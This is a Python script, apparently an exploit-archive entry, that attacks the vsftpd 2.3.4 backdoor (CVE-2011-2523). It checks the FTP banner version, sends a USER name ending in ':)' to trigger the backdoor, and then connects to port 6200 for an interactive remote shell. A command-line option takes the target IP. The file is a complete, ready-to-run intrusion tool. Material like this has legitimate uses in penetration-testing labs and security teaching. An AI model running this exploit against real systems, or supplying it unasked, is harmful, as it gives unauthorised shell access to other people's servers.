exploit.py

#!/usr/bin/python3

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 28-11-2023
# Exploit Author: Sheikh Mohammad Hasan (4m3rr0r)
# Version: vsftpd 2.3.4
# CVE : CVE-2011-2523

from pwn import *
import sys
import getopt
from time import sleep

class ExploitFTP:
    def __init__(self, ip, port=21):
        self.ip = ip
        self.port = port
        self.p = log.progress("")

    def trigger_backdoor(self):
        try:
            self.p.status("Checking Version...")
            io = remote(self.ip, self.port)
            io.recvuntil(b"vsFTPd ")
            version = (io.recvuntil(b")")[:-1]).decode()

            if version != "2.3.4":
                self.p.failure("Version 2.3.4 Not Found!!!")
                exit()
            else:
                self.p.status("Triggering Backdoor....")
                io.sendline(b"USER hello:)")
                io.sendline(b"PASS hello123")
                io.close()

        except Exception as e:
            self.p.failure(f"An error occurred: {str(e)}")
            exit()

    def get_shell(self):
        try:
            self.p.status("Connecting To Backdoor...")
            sleep(1)
            io = remote(self.ip, 6200)
            self.p.success("Got Shell!!!")
            io.interactive()
            io.close()

        except Exception as e:
            self.p.failure(f"An error occurred: {str(e)}")
            exit()

def display_help():
    print(f"Usage: {sys.argv[0]} -t IP [-p PORT]")
    print("Options:")
    print("  -h, --help\t\tShow this help message and exit")
    print("  -t IP\t\t\tTarget IP address")
    print("  -p PORT\t\tTarget port (default is 21)")

if __name__ == "__main__":
    target_ip = None
    target_port = 21

    try:
        opts, args = getopt.getopt(sys.argv[1:], "ht:p:", ["help"])
    except getopt.GetoptError:
        display_help()
        exit()

    for opt, arg in opts:
        if opt in ("-h", "--help"):
            display_help()
            exit()
        elif opt == "-t":
            target_ip = arg
        elif opt == "-p":
            target_port = int(arg)

    if target_ip is None:
        error("Target IP is required. Use -t option.")
        display_help()
        exit()

    try:
        exploit = ExploitFTP(target_ip, target_port)
        exploit.trigger_backdoor()
        exploit.get_shell()

    except KeyboardInterrupt:
        print("\nUser interrupted the execution.")
        exit()